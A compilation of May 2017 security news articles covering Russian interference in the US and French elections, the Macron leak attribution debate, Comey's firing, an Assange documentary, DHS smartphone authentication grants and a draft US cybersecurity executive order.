Asked whether they believed the intelligence community's January assessment that Russia was responsible for hacking and leaking information to influence the elections was accurate, all six spy and law enforcement bosses appearing before the panel said "yes."

They included Director of National Intelligence Dan Coats, CIA director Mike Pompeo and acting FBI director Andrew McCabe, newly installed after Trump fired the agency's chief James Comey this week.

In an overview, Coats told the panel: "We assess that Russia is likely to be more aggressive in foreign global affairs, more unpredictable in its approach to the United States, and more authoritarian in its approach to domestic policies and politics."

He also cited and quoted the intelligence community's annual "Worldwide Threat Assessment" released today, which details past, present and future threats from Russia.

"Moscow has a highly advanced offensive cyber program, and in recent years the Kremlin has assumed a more aggressive cyber posture," it says.

"This aggressiveness was evident in Russia's efforts to influence the 2016 US election, and we assess that only Russia's senior-most officials could have authorized the 2016 US election-focused data thefts and disclosures, based on the scope and sensitivity of the targets."

The assessment comes amid a mushrooming crisis for the Trump team as questions swirl over why the president fired his FBI director, who was overseeing an investigation into Russian election meddling and possible connections between Trump campaign associates and Russia last year.

Trump has repeatedly denounced as "fake news" the accusations that members of his circle coordinated or colluded with Russian officials.

Asked again late last month in a CBS News interview whether he believes Russia tried to interfere in the election, Trump said "I don't know... Could've been China, could've been a lot of different groups."


'Risk': Inside the Inner Sanctum of Wikileaks' Assange

12.5.2017 securityweek BigBrothers
The enigmatic champion of a global movement for transparency and democracy. A Russian stooge. A West-hating attention-seeker. A cold fish with questionable attitudes and alleged diabolical sexual mores.

Julian Assange has been labeled all of these -- and many things besides -- since starting out as a media-savvy Robin Hood figure, wrestling facts from the powerful and serving them up unexpurgated for the masses.

Now, a fugitive from justice dogged by accusations of sexual assault and living a hermetic existence in London's Ecuadoran embassy for the last five years, he cuts a more embattled, slippery figure.

"Risk," a new documentary by Oscar-winning filmmaker Laura Poitras, starts out as an unsettlingly ambivalent portrait of the award-winning iconoclast but ends up revealing a darker side to Assange.

Filmed over six tumultuous years and taking in the 2016 US presidential election, it takes viewers closer than any previous film crew into Assange's inner sanctum.

"This is not the film I thought I was making. I thought I could ignore the contradictions, I thought they were not part of the story. I was wrong. They are becoming the story," Poitras says in a voiceover.

US cable network Showtime announced in April it had partnered with Neon to roll out the film at 36 US locations during May, before a television premiere later in summer.

WikiLeaks, founded by Assange in 2006, specializes in large-scale breaches of classified data that have made headlines around the world, as well as challenging the ethics of security services.

The 45-year-old computer programmer has claimed political asylum at the Ecuadoran embassy in London since 2012, having taken refuge to avoid being sent to Sweden.

- Misogyny -

There is an international arrest warrant out to get him to face allegations of unlawful coercion, sexual molestation and rape dating back to 2010.

Poitras's profile of Assange, who denies any wrongdoing, is a follow-up to her Academy Award-winning "Citizenfour" (2014), about fugitive leaker Edward Snowden and the NSA spying scandal.

Perhaps the most remarkable aspect of "Risk" is its success in shedding light on the ugly misogyny that runs through so much of the tech world, showing Assange describing the sexual assault allegations against him as the product of a feminist conspiracy.

He even suggests that if the alleged victims said sorry to him, he would "apologize for anything I did or didn't do to hurt their feelings."

"Risk" also gets up-close with security expert and close Assange ally Jacob Appelbaum, revealing that he is also facing accusations of sexual misconduct, which he too denies.

Assange doesn't accept that he and Poitras fell out, but appears through messages she reads out on camera to become colder with her, bruised by the fact that she didn't use WikiLeaks to publish Snowden's NSA material.

"That kind of created I think, as you see in the film, a tension between myself and Julian," the 53-year-old said during a Q&A following the North American premiere at the Art of the Real festival in New York last week.

At its height, WikiLeaks could claim to have provided valuable insights into the war on terror, helped bring about the Arab Spring and shone a light on civilian deaths in Iraq.

- Potent force -

Regardless of Assange's plummeting stock in the bourse of public opinion, the organization he founded remains undeniably relevant -- a potent force in geopolitics.

"Risk" underlines its continued influence in the confusion surrounding Assange's intervention in the US presidential election, and his suspected ties with Russia and with members of the Trump campaign.

In July WikiLeaks published 20,000 hacked emails from the Democratic National Committee, some innocuous but others hugely damaging to Hillary Clinton's presidential campaign.

By October, WikiLeaks was publishing thousands of emails from Clinton's campaign chairman, John Podesta, prompting effusive praise from then-candidate Donald Trump.

Assange denies that Russia or any other state was behind the leak.

Despite its focus on the murky world of espionage, "Risk" does have its lighter side, including a hilarious cameo by Lady Gaga paying a visit to Assange.

But had Poitras filmed for a few more months, her documentary could have had a romantic coda.

In a bizarre twist in the Assange saga, ex-Baywatch star Pamela Anderson has recently emerged as a rumored love interest of the secretive Australian, and in a poem posted on her website she complains about the "narrow lens Laura has picked."

The 49-year-old actress has reportedly visited the fugitive several times in recent months.


DHS Funds Smartphone Authentication Projects

11.5.2017 securityweek BigBrothers
The U.S. Department of Homeland Security (DHS) is funding three smartphone digital identity and privacy projects including mobile device attribute verification, mobile authentication, and physical access control. A total of $2.4 million was awarded to the Kantara Initiative, and these three projects are the first to be launched by the Kantara Identity and Privacy Incubator Program (KIPI).

The three KIPI projects involve Mobile Device Attribute Verification (MDAV) from Lockstep Technologies, Australia; Emergency Responder Authentication System for Mobile Users (ERASMUS) from Gluu Inc, USA; and Derived Credentials and NFC for Physical Access Control from Exponent Inc, USA.

"The basis for each project," commented Kantara's executive director, Colin Wallis, "is a unique re-configuration of emerging next generation standards and specifications delivered through mobile devices, like smartphones. The trend of leveraging the ubiquitous mobile device for digital identity solution continues to ramp worldwide. We are seeing a growing interest in incubator programs like KIPI."

Lockstep's MDAV uses certificates to ensure secure attributes, attribute sources and devices. Certificates are already used by many security departments to verify users' mobile devices; but developing an application to deliver the process widens its applicability.

"Potential applications," says Kantara, "include credentials for first responders, value added mobile driver's licenses, anonymous proof of age, clinical trial and e-health record confidentiality, electronic travel documentation, and privacy-enhanced national IDs."

Gluu's ERASMUS is designed for multiple autonomous organizations who need to share up-to-date information about a person's identity, skills and authorizations. It is, suggests Kantara, "especially relevant in the emergency responder community, where state, local and federal government organizations need to collaborate both in person and online."

Noticeably, ERASMUS is also the first implementation of Kantara's nascent Open Trust Taxonomy for Federation Operators (OTTO) standard.

The Exponent project is the development of smartphone NFC capabilities for physical access control. "The employee uses the phone in the same way as their physical Personal Identity Verification (PIV) Card to access a building," explains Kantara, "but the phone implementation provides improved convenience as well as options for difficult use cases such as a lost/stolen card or temporary credentials for non-PIV Card holders."

The MDAV and Exponent projects will improve smartphone authentication options that are already being used by some companies -- in essence, they will make such authentication easier, better and more accessible to security teams.

ERASMUS is a little different in that it delivers federated identity suitable for multiple organizations. In some ways, it is a poor man's NSTIC, the Obama initiated National Strategy for Trusted Identities in Cyberspace, designed to develop an identity ecosystem suitable for everyone, throughout the US.

One possible outcome of multiple identity/authentication projects is a fragmentation of the problem when all effort should be concentrated on a global solution such as NSTIC (or an alternative such as Identity 3). Kantara's Wallis doesn't accept this. "We do have various solutions in use but I don't believe fragmentation is a problem per se," he told SecurityWeek. "How else is progress made? Solutions are developed and tested. They go through their lifecycle and improvement updates are made until one is adopted. We are seeing that process with these three authentication projects."

But there does remain one issue. Not all security practitioners feel able to adopt smartphone-based authentication solutions because not all users have smartphones. This is particularly relevant for blue-collar industries and some multi-nationals. "There's no way around it," said Wallis. You need a smartphone for the advanced authentication we are talking about here." But, he adds, "Various analysts report that by 2020 there will be six billion smartphones in use. So, the problem of smartphone availability could solve itself. In the meantime, alternative authentication approaches to smartphones to consider include SMS, and voice authentication."


Who Hacked French President-elect Emmanuel Macron's Campaign?

11.5.2017 securityweek BigBrothers
One thing is clear. The campaign of French President-elect Emmanuel Macron was hacked prior to the French presidential election this last Sunday -- and the finger was immediately pointed at Russia's APT28 (Fancy Bear). Russia has been caught meddling in western politics once again.

Evidence of APT28 involvement seems to come from three sources: the U.S. National Security Agency (NSA), security researchers, and circumstantial. The NSA was quick to blame Russia via a Senate Armed Services Committee hearing on Tuesday this week. The head of the NSA, Admiral Mike Rogers, told the committee that the NSA had warned its French counterparts at the time of the hack: "Look, we're watching the Russians, we're seeing them penetrate some of your infrastructure." The Russians are here.

Evidence from security researchers focuses on two areas: phishing sites and leaked document metadata. One phishing site, apparently created by APT28 on March 25, 2017 and clearly designed for the Macron campaign, 'onedrive-en-marche-dot-fr', was reported by Trend Micro in April. Other sites apparently tied to the APT28 infrastructures include portal-office-dot-fr, accounts-office-dot-fr and mail-en-marche-dot-fr -- and another with the surprising name of totally-legit-cloud-dot-email.

The document evidence includes the discovery of Cyrillic characters within some documents apparently leaked by the hackers. WikiLeaks tweeted on Saturday (the day before the French presidential vote), "#MacronLeaks assessment update: several Office files have Cyrillic meta data..." The obvious assumption is that Russian APT hackers altered the files before leaking them.

But while clearly suggesting possible APT28 involvement in the hack, French security researcher x0rz has demonstrated that neither of these can be taken as actual proof. In a blog post on Tuesday, he demonstrated the ease with which anybody could edit metadata and pretend to be anyone. He went further to explain how "I setup my own domain mimicking some APT28 artefacts: totally-legit-cloud-dot-email that has been registered using the same information as another APT28 phishing domain used during the attack on EM staff... This domain (that I own) is now linked with actual APT28 infrastructure according to some threat intelligence OSINT tools" (eg, threatcrowd.org).

In other words, anyone could have established the APT28-related phishing domains, and anyone could have planted Cyrillic characters in the metadata. x0rz believes that all this proves is that it might have been APT28, but it might not have been APT28.

The circumstantial evidence is that the hack follows the basic pattern used by (what everybody believes to have been) APT28 in the US election hacks: phish for the emails of the candidate you want to lose, and then leak them. This evidence claims that since this is what APT28 does, and this is what Russia would want, then therefore this was done by Russia.

But the parallel is not perfect. The Macron hack occurred far later in the election campaign than the DNC hack; the phishing emails appear to be far clumsier; and the email leak occurred too late to have any effect on the election outcome.

The Macron campaign's answer to this is that they were expecting hackers, that they knew they would not be able to prevent a hack, and they prepared for it with what amounts to the 'deception defense'. The New York Times reported, "'We created false accounts, with false content, as traps. We did this massively, to create the obligation for them to verify, to determine whether it was a real account,' Mr. Mahjoubi [the campaign's digital director] said. 'I don't think we prevented them. We just slowed them down,' he said. 'Even if it made them lose one minute, we're happy'."

SecurityWeek talked to Kevin Eley, VP EMEA at TrapX, about the deception defense. In full, it amounts to the installation of a honeypot-like platform within the customer's infrastructure. Attackers are diverted towards the false shares, false databases, false structure -- and as soon as anything attempts to access them, the existence of an intruder is confirmed. The intrusion can then be tracked back to its source and the vulnerability closed. And if the intruder does manage to exfiltrate any data, it is false data.

"In the Macron hack," he told SecurityWeek, "the deception seems to be at the data level only." He confirmed that although this could not have been achieved by the campaign on the fly, it could have been done well in advance anticipating a hack. In other words, it can explain but does not prove why the leak occurred so late -- the attackers simply didn't know what to leak.

Just to confuse the issue further, Tyler Durden, discussing the Shadow Brokers' most recent leaks, writes today on zerohedge, "Inside the NSA dump among many other findings, we find hundreds of NSA attacks on China, as well as penetration attempts in which the NSA 'pretends' to be China so one wonders how difficult it would be for the NSA to pretend they are, oh, say Russia?"

So, who did hack Macron? The obvious conclusion is Russia; because Russia would benefit most from a Le Pen victory. But the timing of the document leaks was far too late to benefit Le Pen, and would more likely benefit Macron. The Occupy Movement could alternatively say that the 1% would benefit from an ex-Rothschild banker (Macron); just as they would benefit from a Republican president and a City of London not controlled by Brussels. It is not just Russia that has an incentive in meddling.

"As far as attribution related to the hacks Macron's campaign suffered, or the origins of the stolen documents," F-Secure researcher Andy Patel told SecurityWeek, "fingers are being pointed based on 'who would/wouldn't do something like this?' by people who don't have access to enough evidence to be 100% certain of anything."

The bottom line is that we do not know who hacked Macron, nor why. It might have had nothing to with discrediting Macron per se, but merely to add to the current confusion over real and fake news on the internet. "If it's information warfare -- rather than cyber warfare," suggests F-Secure security advisor Sean Sullivan, "then the point is not stealth. It's to make the point that your systems are under attack, your options are limited, and you always need to be on your guard. And there's nothing you or your leaders can do to stop us!

"Nothing is certain. But that's probably also exactly the goal of the information warfare, to get you to believe in nothing."


President Donald Trump Fires the FBI Director James Comey
11.5.2017 securityaffairs BigBrothers

President Trump on Tuesday fired the director of the F.B.I., James B. Comey due to the FBI’s investigation into alleged links between Trump and Russia.
The news has shocked the media, President Donald Trump has fired the director of the Federal Bureau of Investigation, James Comey. The most popular opinion is that Comey was fired due to the FBI’s investigation into alleged links between Trump and Russia.

Last Wednesday, Comey testified before Congress about the role of the Kremlin in influencing the 2016 US Presidential election with cyber attacks against the DNC.

The way Comey was informed was absurd, he was making a speech in Los Angeles when he received the news.

According to The White House, Comey was fired on the “clear recommendation” of Deputy Attorney General Rod Rosenstein and Attorney General Jeff Sessions, officially because the official was no longer able to lead the bureau effectively.
“While I greatly appreciate you informing me, on three separate occasions, that I am not under investigation, I nevertheless concur with the judgment of the Department of Justice that you are not able to effectively lead the Bureau,” Trump wrote in a termination letter to the FBI Director.

Peter Alexander ✔ @PeterAlexander
BREAKING: Full letter from Trump to Comey says former FBI Director "not able to effectively lead the Bureau."
11:54 PM - 9 May 2017
229 229 Retweets 157 157 likes
The US deputy attorney general Rod Rosenstein explained that Comey was fired due to the way the FBI investigated into the case related to the disclosure of the Hillary Clinton‘s emails.

The US deputy attorney Rosenstein also blamed Comey for his decision to close this investigation without prosecution.

The Rosenstein’s memo did not explicitly refer the investigation conducted by the FBI on the cyber attacks against US politicians during the 2016 US Presidential election.

The Trump’s decision was criticized by the media and of course by the US Democrats, who defined the decision a “Nixonian” move.

Democrats speculate that Comey’s firing is linked to alleged support offered by Russian APT groups.
Tim Kaine, Senator from Virginia and former Democratic vice presidential nominee, said the Comey’s firing proved “how frightened the Admin is over Russia investigation,” arguing that the firing was “part of a growing pattern by White House to cover-up the truth.”

Follow
Senator Tim Kaine ✔ @timkaine
Trump firing Comey shows how frightened the Admin is over Russia investigation
12:16 AM - 10 May 2017
11,307 11,307 Retweets 24,456 24,456 likes

Below a Tweet shared by the American Civil Liberties Union (ACLU):

Follow
ACLU National ✔ @ACLU
In America, no one is above the law. Firing people who question authority is done by dictators, not democratically-elected presidents. https://twitter.com/nytimes/status/862332770177208321 …
6:26 PM - 10 May 2017
4,954 4,954 Retweets 8,436 8,436 likes
Below the opinion of the NSA whistleblower, Edward Snowden, who condemn the termination:

Follow
Edward Snowden ✔ @Snowden
This FBI Director has sought for years to jail me on account of my political activities. If I can oppose his firing, so can you. https://twitter.com/Snowden/status/862067649748119553 …
12:17 AM - 10 May 2017
50,547 50,547 Retweets 81,465 81,465 likes
Trump has appointed FBI Deputy Director Andrew McCabe to serve as an interim FBI director.


Trump Fires FBI Director Over Clinton Probe, Amid Russia Investigation
10.5.2017 thehackernews BigBrothers
President Donald Trump has abruptly fired James Comey, the director of the Federal Bureau of Investigation (FBI) who was leading an investigation into alleged links between Trump and Russia.
The White House announced on Tuesday that Comey was fired on the "clear recommendation" of Deputy Attorney General Rod Rosenstein and Attorney General Jeff Sessions, citing the reason that he was no longer able to lead the bureau effectively.
"While I greatly appreciate you informing me, on three separate occasions, that I am not under investigation, I nevertheless concur with the judgment of the Department of Justice that you are not able to effectively lead the Bureau," Trump wrote in a termination letter to Comey.
Later a memo from the US deputy attorney general Rod Rosenstein explained that Comey was fired as director of the FBI over mishandling of the inquiry into Hillary Clinton's emails, including his decision to close this investigation without prosecution.
However, the memo doesn't mention the FBI investigation into possible links between the Trump campaign and the Russian government.
Mr. Comey was delivering a speech in Los Angeles when he learned that Trump had fired him, and initially he thought it was a fairly funny prank.
Comey's Firing has Drawn Wide Criticism
The move stunned Washington and raised suspicions among Democrats, who called it a "Nixonian" move by the Trump.
Democrats quickly suggested that Comey's firing may have more to do with 'investigation into Trump's ties with Russia' than with the Hillary email scandal.
Last Wednesday, Comey testified before Congress about Russia's role in influencing the 2016 U.S. presidential election.
Tim Kaine, Senator from Virginia and former Democratic vice presidential nominee, made a series of tweets, saying the Comey's termination proved "how frightened the Admin is over Russia investigation," arguing that the firing was "part of a growing pattern by White House to cover-up the truth."
Here's a statement from American Civil Liberties Union (ACLU) Executive Director Anthony D. Romero:
"The independence of the FBI director is meant to ensure that the president does not operate above the law. For President Trump to fire the man responsible for investigating his own campaign’s ties to the Russians imperils that fundamental principle.
Regardless of how one judges the performance of James Comey in either the Hillary Clinton or Russia investigations, President Trump's dismissal of a sitting FBI director raises serious alarm bells for our system of checks and balances." Meanwhile, Senator Minority Leader Chuck Schumer called for an independent investigator to take over the Russia probe.
Even NSA whistleblower Edward Snowden condemn the termination despite Comey "has sought for years to jail me on account of my political activities," he tweeted.
"Set politics aside: every American should condemn such political interference in the bureau's work" — Edward Snowden.
Trump has appointed FBI Deputy Director Andrew McCabe to serve as an interim director unless they get someone to replace Comey, who was serving the FBI from last 27 years and appointed to the director's position by President Barack Obama in 2013.


Trump Fires FBI Director James Comey

10.5.2017 securityweek BigBrothers
FBI Director James Comey

US President Donald Trump on Tuesday fired his FBI director James Comey, the man who leads the agency charged with investigating his campaign's ties with Russia -- a move that sent shockwaves through Washington.

The surprise dismissal of Comey, who played a controversial role in last year's presidential election, came as he was leading a probe into whether Trump's aides colluded with Moscow to sway the November vote.

Top Senate Democrat Chuck Schumer said he told Trump he was making a "big mistake" by dismissing Comey, a move that prompted parallels with a decision by a crisis-plagued Richard Nixon to fire his attorney general.

Trump "has accepted the recommendation of the attorney general and the deputy attorney general regarding the dismissal of the director of the Federal Bureau of Investigation," his spokesman Sean Spicer told reporters.

A search for a new FBI director was to begin "immediately," the White House said.

In a letter, Trump told Comey: "You are hereby terminated and removed from office, effective immediately."

"While I greatly appreciate you informing me, on three separate occasions, that I am not under investigation, I nevertheless concur with the judgment of the Department of Justice that you are not able to effectively lead the Bureau."

"It is essential that we find new leadership for the FBI that restores public trust and confidence in its vital law enforcement mission," Trump said.

The stated reason for Comey's dismissal -- according to a memo from Deputy Attorney General Rod Rosenstein that was circulated by the White House -- was for mishandling the probe into Democratic presidential hopeful Hillary Clinton's emails.

But his sacking raised immediate questions about Trump's motives.

FBI directors are appointed for a single 10-year term. The 56-year-old Comey, who is popular among rank-and-file agents, was appointed four years ago.

He played an outsized -- and controversial -- role on the American political stage over the past year, lobbing one bombshell after another that rankled both parties in Washington.

Clinton accused Comey of trashing her chances of becoming president by revealing an renewed investigation into her email use.

Comey told lawmakers last week he felt "mildly nauseous" at the thought that he had swayed the election -- but could not have acted any other way.

- 'Nothing less than Nixonian' -

Since the start of Trump's presidency, the FBI chief had increasingly appeared to be a thorn in the president's side.

He has confirmed that the agency is investigating Russian interference in last year's presidential election and notably Moscow's possible collusion with Trump's campaign.

Democrats -- already angry that Congressional inquiries into Russian meddling have been hamstrung by Republicans' willingness to defend Trump -- voiced sharp concerns that the FBI's investigation may now be in jeopardy too, with several calling for an independent commission to take over the probe.

"This is nothing less than Nixonian," charged Senator Patrick Leahy of Vermont, who called Trump's official justification for firing Comey "absurd."

"That fig leaf explanation seeks to cover the undeniable truth: The president has removed the sitting FBI director in the midst of one of the most critical national security investigations in the history of our country -- one that implicates senior officials in the Trump campaign and administration," he charged.

When Trump initially decided to keep Comey -- who was appointed by Barack Obama -- in his job, it raised eyebrows from critics who saw it as a tacit reward for his role in damaging Clinton's chances.

But within months, the FBI chief was back in the national spotlight -- this time taking aim at Trump.

During testimony to Congress last month, Comey flatly rejected Trump's explosive claim that he was wiretapped by his predecessor.

Comey's public testimony -- watched by millions around the world -- came as Trump sought to steer the news focus by calling the question of Russian election meddling "fake news."

But it had become increasingly clear that Comey had set his sights on the issue of Russia's election meddling, which has stalked Trump's presidency since he took office.


U.S. Alerted France to Russia Hack Targeting Macron: NSA

10.5.2017 securityweek BigBrothers
The head of America's National Security Agency said Tuesday that Russia was behind the 11th-hour hack of French President-elect Emmanuel Macron's campaign team, and that US officials had informed France a cyber-attack was underway.

The hacking attack on Macron's campaign, just hours ahead of Sunday's run-off vote that saw him elected, led to thousands of files being leaked online.

"We had become aware of Russian activity," Admiral Mike Rogers told a Senate Armed Services Committee hearing.

"We had talked to our French counterparts prior to the public announcements of the events that were publicly attributed this past weekend and gave them a heads up.

"'Look, we're watching the Russians, we're seeing them penetrate some of your infrastructure. Here's what we've seen, what can we do to try and assist?'" said Rogers, who also heads US Cyber Command.

The NSA chief did not specify what type of "infrastructure" has been compromised. He said that the agency was in contact with its counterparts in Britain and Germany ahead of elections in those countries later this year.

NSA LogoRogers drew comparisons between the hack targeting Macron and those of the US Democratic Party and a close aide to presidential candidate Hillary Clinton ahead of the November election won by Donald Trump.

Washington has officially accused Russia of being behind those hacks, saying Moscow was trying to boost Trump's chances of victory.

"The Russians appear to be assessing that some leaders might be more inclined to be supportive of their positions," Rogers told lawmakers.

"You saw that just play out in the French election where there clearly was a difference between these two candidates and their views of Russia," he said.

Thousands of emails and documents from Macron's campaign were dumped online by hackers shortly before midnight in France on Friday and were then relayed by anti-secrecy group WikiLeaks.

A statement from the 39-year-old Macron called it a "massive and coordinated" hack. Paris prosecutors have opened a probe into the attack, a source close to the investigation has said.


#MacronLeaks metadata suggests Russian threat actors behind Macron’s hack
9.5.2017 securityaffairs BigBrothers

#MacronLeaks – Experts discovered evidence suggesting Russian threat actors behind the hack of French presidential candidate Macron.
Who are the hackers that attempted to subvert the final vote of French Presidential Election by targeting the Macron’s campaign?

Hackers leaked a 9GB batch of internal documents through the Magnet file-sharing service. The Macron data leakage has happened while candidates are banned from publicly discussing the campaign, clearly such kind of events can subvert the final result of the election.

Security experts and media blamed Russia for the attack, but the without referencing solid clues.

According to a report published by Trend Micro in April, the notorious APT 28 group spied on numerous high-profile targets, including the Macron’s campaign.

Now it seems that analysts have discovered evidence that suggests the involvement of Russia-linked threat actors.

The files stolen from Macron’s staff systems were initially distributed via links posted on 4Chan and then shared by WikiLeaks.

Forensic experts analyzed file metadata that seems to be linked to a Russian government contract employee, this person is suspected to have falsified some of the dumped documents for obvious reasons.

Wikileaks who was informed of the discovery acknowledged the presence of metadata pointed to a Russian company with ties to the government.

The experts discovered that the name of an employee for the Russian government security contractor Evrika appears 9 times in the metadata of the leaked dump.


WikiLeaks ✔ @wikileaks
#MacronLeaks: name of employee for Russian govt security contractor Evrika appears 9 times in metadata for "xls_cendric.rar" leak archive
11:44 PM - 6 May 2017
2,853 2,853 Retweets 2,625 2,625 likes
Evrika (“Eureka”) ZAO is a Russian ICT firm based in St. Petersburg that is known for its collaboration with the Kremlin. The company also works for the Federal Security Service of the Russian Federation (FSB).
The metadata in some Microsoft Office files included in the dump shows that the last person to have edited the documents is “Roshka Georgiy Petrovich,” an Evrika ZAO employee.
Macron hacking campaing

Matt Suiche ✔ @msuiche
Dropping files after appending metadata to Microsoft Offices files such as "Автор" or "Область_печати" Why? #attribution H/T @voulnet
9:45 AM - 6 May 2017
204 204 Retweets 155 155 likes

The metadata related to the upload of the Macron files to archive.org also includes an e-mail address (frankmacher1@gmx.de) for the person who made the operation:

6 May
Pwn All The Things @pwnallthethings
What kind of monster does their mandatory training on time without being reminded? You want a guy who employs folks like that as President?
Follow
Pwn All The Things @pwnallthethings
Well this is fun pic.twitter.com/oXsH83snCS
3:41 AM - 6 May 2017
View image on Twitter
130 130 Retweets 196 196 likes

The e-mail address frankmacher1@gmx.de is registered with a German free webmail provider that was used in past operation by the APT28 group for phishing campaigns against the US DNC and the German Chancellor Angela Merkel’s political party.

Experts believe that the APT28 edited the documents and spread them via social media as part of a PSYOPs operation, like the one conducted against Clinton’s party during 2016 Presidential Election.

I have reached my colleague Emanuele Gentili (@emgent) Director of Cyber Intelligence of the Italian Security Firm TS-WAY who shared with me this interesting document:

MacronLeak_and_russia_link_chart_v0.1a


What Can be Expected in Trump's Cybersecurity Executive Order?

9.5.2017 securityweek BigBrothers
Executive Order - Cybersecurity

The latest draft of President Trump's much anticipated cybersecurity executive order was posted to the internet last week by security consultant Paul Rosenzweig. It is not the first and may not be the last draft that gets public scrutiny before the final version is formally published. Although it is currently a draft, it provides detailed insight into what can be expected.

The draft Trump Cybersecurity executive order (EO) follows the recent trend in legislation and regulation to take responsibility for cybersecurity away from the practitioners (CIOs and CISOs) and force it to the top of an organization. Agency Heads will be responsible for security and will be required to report regularly to the OMB and DHS (or the Secretary of Defense and the Director of National Intelligence for national security systems).

The latest draft cybersecurity EO displays semantic rather than substantive changes over the previous leaked version -- although with a new section on security workforce development that includes monitoring the workforce development of potential adversaries. The limited changes could suggest that this EO is close to being issued; however, with no federal CISO to replace Gregory Touhill (who resigned Jan. 17) yet announced, it is equally likely there will yet be some delay.

Touhill publicly announced his resignation on LinkedIn. He said, "Frankly, we don't need more policies, we need to execute the ones we have and eliminate the ones that no longer are aligned with contemporary best practices."

Nevertheless, he went on to describe what lies at the heart of Trump's draft EO: "We need a better architecture focused on shared services capabilities rather than one built on organization charts. We need accountability and ownership built into our culture. We need to intelligently leverage cloud computing and mobility solutions that produce effective, efficient, and secure results. We need to do regular risk assessments across each department and agency. We need to better train and regularly exercise our personnel."

The draft EO does indeed focus on a better and updated architecture, and a risk management approach to securing federal systems. It notes, for example, "The executive branch has for too long accepted antiquated and difficult–to-defend IT." Not everyone agrees, however, that updating systems should be the priority -- with suggestions that securing new and complex systems will be no easier than securing older, more simple systems.

There is no explicit definition of an 'antiquated' IT system, although the draft does call out 'known but unmitigated vulnerabilities'. These include "using operating systems or hardware beyond the vendor's support lifecycle..." Antiquated may effectively mean 'no longer supported'; although it is worth noting that on 12 April 2017, Frank Konkel wrote in NextGov, "The U.S. nuclear arsenal is coordinated by the 54-year-old Strategic Automated Command and Control System, run on 1970s-era IBM mainframes that still use 8-inch floppy disks."

Risk management is specified and required. "Agency Heads will be held accountable by the President for implementing risk management measures commensurate with the risk and magnitude of the harm that would result from unauthorized access, use, disclosure, disruption, modification, or destruction of IT and data. They will also be held accountable by the President for ensuring that cybersecurity risk management processes are aligned with strategic, operational, and budgetary planning processes, in accordance with chapter 35, subchapter II of title 44, United States Code."

Risk management is specifically tied to "The Framework for Improving Critical Infrastructure Cybersecurity (the Framework), or any successor document, developed by the National Institute of Standards and Technology to manage the agency's cybersecurity risk."

Protecting the critical infrastructure (CI) is another area of focus. Indeed, the executive order is titled, 'Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure'. The CI is defined as comprising those "entities identified pursuant to section 9 of Executive Order 13636 of February 12, 2013 (Improving Critical Infrastructure Cybersecurity)." The current list identified by the DHS comprises 16 CI sectors, including energy, communications, finance, healthcare, defense and emergency services.

These sectors will be examined to see if federal agencies can provide additional security support in their risk management efforts, and whether there are any obstacles in doing so. There is some criticism, however, that in specifying section 9, 13636 sectors for special treatment, other critical areas (such as water purification and on-line voting) might suffer.

One area that does cover the wider private sector is the desire to promote resilience against botnets and other automated, distributed threats. Here, "The Secretary of Commerce and the Secretary of Homeland Security shall jointly lead an open and transparent process to identify and promote action by appropriate stakeholders to improve the resilience of the Internet and communications ecosystem and to encourage collaboration with the goal of dramatically reducing threats perpetrated by automated and distributed attacks (e.g., botnets)."

It is perhaps disappointing that there is no specific reference here to the internet of things (IoT); nor indeed any reference to the IoT anywhere in the draft EO. Many security experts fear a dire future of distributed denial of service attacks from IoT-based botnets (such as Mirai); and a more specific targeting of intrinsic IoT insecurity would benefit the entire internet.

The section of the executive order that specifies 'cybersecurity for the nation' is limited to broad brush strokes. The 'policy' is to "promote an open, interoperable, reliable, and secure Internet that fosters efficiency, innovation, communication, and economic prosperity, while respecting privacy and guarding against disruption, fraud, and theft." Subsections talk about deterrence and protection (demanding "options for deterring adversaries and better protecting the American people from cyber threats"); international cooperation (requesting "an engagement strategy for international cooperation in cybersecurity"); and workforce development (including, for example, an assessment of "the scope and sufficiency of U.S. efforts to ensure U.S. national security-related cyber capability advantage").

It would not be possible for a single short document on cybersecurity to satisfy everyone -- and there are indeed both strong and weak points in this document. For example, there are fifteen separate reports required by the draft EO, which must be delivered in timescales ranging from 45 days to 240 days from the date of the order. The effect of these reports could be to delay actual implementation of important security policies. It is tempting to refer to the words former federal CISO Gregory Touhill: "We don't need more policies, we need to execute the ones we have..."

One very strong point, however, is that the policy outlined by this executive order (albeit just a draft for now) builds on the cybersecurity efforts already achieved by the previous administration. This will promote an invaluable bi-partisan approach to the future of federal and critical infrastructure security.


Top Obama Officials to Testify on Russian Election Interference

8.5.2017 securityweek BigBrothers
The scandal over Russian meddling in last year's US presidential election returns to the forefront of Washington politics after weeks of quiet on Monday, when two top officials from the Obama administration are set to testify in Congress.

Sally Yates -- acting attorney general in the Trump administration for 10 days before being fired -- could bring new pressure on the White House over what it knew about former national security adviser Michael Flynn's communications with Russian officials.

Obama's director of national intelligence James Clapper is also set to testify, after repeatedly warning of the need to get to the bottom of how the Russians interfered in the election, and whether anyone on President Donald Trump's team colluded with Moscow.

The case simmered for weeks as attention focused on what keynote legislation the president could push through in his first 100 days, a milestone reached last week.

Congressional investigations into Russian meddling have also been held up by infighting between Democrats and Republicans over how aggressively to pursue a matter that continues to cast a cloud over Trump's election win.

Dianne Feinstein, the top Democrat on the Senate Intelligence Committee, which also is investigating Russia's role in the election, said she is eager to hear Yates's testimony.

"Sally Yates is very much respected. She's a professional. She's not a politician. She's spent a lot of time in the department," Feinstein told NBC News's "Meet the Press" program.

"She apparently has some information as to who knew what when that she is willing to share -- and that would be what she knew about Michael Flynn's connections to Russia," said Feinstein.

- Trump: Russia story is 'phony' -

Trump last week repeated his dismissal of US intelligence chiefs' conclusion that Moscow had sought to boost his campaign over his Democratic rival Hillary Clinton's in an effort overseen by Russian President Vladimir Putin.

In an interview with CBS's "Face the Nation" program marking his 100 days, Trump last week again rejected the official view that Russians hacked Democratic Party computers and communications.

"(It) could have been China, could have been a lot of different groups," he said.

On Tuesday, he again branded the whole story as fake. "The phony Trump/Russia story was an excuse used by the Democrats as justification for losing the election," he said on Twitter.

Trump's dismissals notwithstanding, the Senate Judiciary Committee -- where Yates and Clapper are to appear on Monday -- and the House and Senate intelligence committees are stepping up their probes, calling numerous current and former government witnesses to testify, mostly behind closed doors.

And the FBI is continuing its own investigation into possible collusion.

The country's top intelligence officials say they have no doubt that Moscow tried to swing the election against Clinton last year through hacking and disinformation.

Nor do they doubt that people closely associated with the Trump campaign -- including Flynn, onetime foreign affairs adviser Carter Page and former campaign chairman Paul Manafort -- all had ongoing contacts with Russians.

But whether those contacts resulted in any collusion with Moscow remains unproved.

